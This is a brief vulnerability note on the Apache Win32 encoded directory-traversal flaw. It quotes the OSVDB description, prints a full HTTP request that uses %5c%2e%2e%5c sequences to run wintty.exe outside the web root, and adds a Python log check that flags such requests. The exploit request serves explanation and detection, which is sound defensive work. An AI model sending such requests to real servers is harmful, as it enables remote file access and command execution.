Apache on Windows
URL decoding error
Remote access
OSVDB
From the OSVDB page:
Apache Win32 contains a flaw that allows a remote attacker to access arbitrary files and execute arbitrary binaries outside of the web path. The issue is due to the server not properly sanitizing user input, specifically encoded traversal style attacks (../../) supplied via the URI.
GET /cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO HTTP/1.1
Host: www.i-pi.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040114
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
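A log-side check for the request shown above, added here as an example (not OSVDB's or Apache's code): it percent-decodes the path, treats the decoded backslash as a Windows path separator, and flags targets that name the script alias but resolve outside it. The `/cgi-bin/` alias constant, the function names and the two benign sample lines are assumptions made for the illustration.

```python
from urllib.parse import unquote

ALIAS = "/cgi-bin/"  # assumption: URL prefix mapped to the script directory


def resolve(raw_target):
    """Resolve a target as Windows would; return (resolved_path, escaped_root)."""
    path = unquote(raw_target.split("?", 1)[0])  # decode %5c, %2e, ...
    stack, escaped_root = [], False
    # After decoding, "\" is a path separator on Windows, same as "/".
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped_root = True  # climbed above the URL root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped_root


def is_traversal(raw_target, alias=ALIAS):
    """True if the target climbs above the root, or names `alias` but resolves outside it."""
    resolved, escaped_root = resolve(raw_target)
    literal = raw_target.split("?", 1)[0].lower()
    if escaped_root or not literal.startswith(alias.lower()):
        return escaped_root
    return not (resolved + "/").lower().startswith(alias.lower())


def scan(request_lines):
    """Return targets of flagged 'METHOD target VERSION' request lines."""
    targets = (line.split() for line in request_lines)
    return [p[1] for p in targets if len(p) == 3 and is_traversal(p[1])]


# Constructed sample: the first entry is the request line quoted on this page,
# the other two are benign requests made up for contrast.
SAMPLE = [
    "GET /cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO HTTP/1.1",
    "GET /cgi-bin/printenv.pl?lang=en HTTP/1.1",
    "GET /docs/release%20notes.html HTTP/1.1",
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The comparison is made on the resolved path rather than on the raw string, which is why the encoded `%5c%2e%2e%5c` sequence is caught even though the literal text `../` never appears in the request.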